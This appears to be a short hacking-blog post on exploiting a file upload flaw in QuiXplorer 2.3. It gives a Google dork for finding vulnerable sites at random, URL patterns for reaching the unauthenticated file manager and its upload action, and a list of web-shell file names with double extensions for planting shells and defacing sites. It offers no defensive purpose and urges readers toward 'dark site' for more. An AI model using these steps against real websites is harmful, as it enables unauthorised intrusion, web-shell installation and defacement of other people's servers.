QuiXplorer 2.3 Bugtraq File Upload Vulnerability defaceing sites easily
Google Dork :
intitle:"QuiXplorer 2.3 - the QuiX project"
select any website from search results
Vulnerability
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After Going to this you will saw a file manager
you can upload your files here
find this edit file create file etc icons in page and click on last, its upload option
You can direct upload too with chnaging url, just put
action=upload&order=name&srt=yes
after index.php?
example :
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view
Stay connected with dark site for more vulnerability ...
Post a Comment
Post a Comment
Feel Free To Ask Your Query we Love To Answer